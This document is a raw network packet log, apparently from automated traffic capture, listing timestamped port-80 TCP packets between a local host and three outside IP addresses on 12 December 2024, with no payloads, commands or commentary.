                                                                                                            Dec 12, 2024 10:20:23.117666960 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.117707014 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.119096041 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.119138956 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.119184971 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.119227886 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.120579958 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.120623112 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.120691061 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.120733023 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.122081041 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.122109890 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.122144938 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.122144938 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.122241020 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.122277975 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.123630047 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.123686075 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.123742104 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.123785019 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.125185013 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.125227928 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.125557899 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.125601053 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.126669884 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.126713037 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.126785994 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.126828909 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.128216982 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.128243923 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.128273964 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.128274918 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.131190062 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.131201982 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.131239891 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.131347895 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.131402016 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.132193089 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.132237911 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.133296013 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.133306026 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.133339882 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.134397030 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.134407043 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.134439945 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.136117935 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.136128902 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.136163950 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.138000011 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.138010979 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.138041019 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.138853073 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.138896942 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.138948917 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.138999939 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.140400887 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.140443087 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.140455008 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.140496969 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.141876936 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.141921997 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.141995907 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.142036915 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.143384933 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.143470049 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.143532038 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.143578053 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.144895077 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.144949913 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.145065069 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.145113945 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.146452904 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.146506071 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.146584988 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.146635056 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.148036003 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.148113012 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.148164034 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.148205996 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.149713039 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.149723053 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.149768114 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.150974989 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.151035070 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.151106119 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.151154041 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.152504921 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.152556896 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.152647972 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.152709961 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.154230118 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.154239893 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.154287100 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.155637980 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.155647993 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.155688047 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.157135010 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.157188892 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.157195091 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.157238007 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.158631086 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.158679962 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.158729076 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.158775091 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.160103083 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.160150051 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.160233974 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.160279989 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.161628962 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.161684990 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.161736012 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.161782980 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.163132906 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.163189888 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.163286924 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.163337946 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.164635897 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.164685011 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.164760113 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.164807081 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.166165113 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.166210890 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.166327953 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.166376114 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.167711973 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.167762041 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.167839050 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.167886972 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.169209957 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.169254065 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.169331074 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.169373989 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.170754910 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.170808077 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.170905113 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.170955896 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.172269106 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.172329903 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.172379971 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.172427893 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.173789978 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.173847914 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.173896074 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.173945904 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.175262928 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.175312996 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.175384998 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.175432920 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.236622095 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.236704111 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.236856937 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.237250090 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.237546921 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.237626076 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.237637043 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.237890005 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.239037037 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.239082098 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.239115953 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.239135027 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.240443945 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.240504026 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.240559101 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.240607977 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.241761923 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.241828918 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.241897106 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.241945982 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.243187904 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.243247986 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.243354082 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.243406057 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.244585991 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.244640112 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.244707108 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.244755030 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.245889902 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.245899916 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.245944023 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.247287989 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.247298002 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.247338057 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.248461962 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.248516083 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.248593092 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.248644114 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.249747992 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.249803066 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.249864101 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.249914885 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.251048088 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.251101971 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.251283884 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.251333952 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.252332926 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.252382994 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.252489090 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.252537012 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.253590107 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.253601074 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.253639936 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.254786968 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.254837036 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.254853964 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.254899979 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.256048918 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.256103992 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.256171942 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.256221056 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.257249117 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.257297993 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.257347107 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.257395983 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.258414984 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.258464098 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.258518934 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.258572102 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.259598017 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.259645939 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.259718895 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.259767056 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.260799885 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.260852098 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.260899067 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.260950089 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.261962891 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.262012959 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.262068033 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.262115955 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.263137102 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.263184071 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.263300896 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.263350010 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.264385939 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.264435053 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.264499903 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.264548063 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.265464067 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.265512943 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.265574932 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.265645027 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.266661882 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.266701937 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.266712904 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.266746044 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.267756939 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.267808914 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.267924070 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.267973900 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.268980980 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.269028902 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.269144058 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.269192934 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.270097971 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.270145893 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.270164967 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.270230055 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.271085978 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.271136999 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.271183968 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.271234035 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:31.852564096 CET4916780192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:31.972100019 CET8049167188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:31.972206116 CET4916780192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:31.988941908 CET4916780192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:32.108731985 CET8049167188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:32.108752966 CET8049167188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:32.108922005 CET4916780192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:32.228483915 CET8049167188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:33.240324020 CET8049167188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:33.240577936 CET8049167188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:33.240628004 CET4916780192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:33.241118908 CET8049167188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:33.241163969 CET4916780192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:33.496368885 CET4916780192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:34.513634920 CET4916880192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:34.633368969 CET8049168188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:34.633471012 CET4916880192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:34.645442009 CET4916880192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:34.764889002 CET8049168188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:35.908523083 CET8049168188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:35.908814907 CET8049168188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:35.908998013 CET4916880192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:35.910017014 CET8049168188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:35.910298109 CET4916880192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:36.148386955 CET4916880192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:37.166543007 CET4916980192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:37.285981894 CET8049169188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:37.286089897 CET4916980192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:37.306662083 CET4916980192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:37.426734924 CET8049169188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:37.426754951 CET8049169188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:37.427007914 CET4916980192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:37.546741009 CET8049169188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:37.546843052 CET8049169188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:38.560563087 CET8049169188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:38.560585976 CET8049169188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:38.560645103 CET4916980192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:38.561058998 CET8049169188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:38.561115026 CET4916980192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:38.818429947 CET4916980192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:39.834192038 CET4917080192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:39.953849077 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:39.954160929 CET4917080192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:40.044104099 CET4917080192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:40.163887024 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:41.230292082 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:41.230309963 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:41.230423927 CET4917080192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:41.230854034 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:41.230906010 CET4917080192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:41.233593941 CET4917080192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:41.353027105 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:46.866836071 CET4917180192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:46.986232042 CET804917185.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:46.986299038 CET4917180192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:47.008343935 CET4917180192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:47.127675056 CET804917185.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:47.127778053 CET4917180192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:47.127857924 CET804917185.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:47.247265100 CET804917185.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:48.270581007 CET804917185.25.177.138192.168.2.22
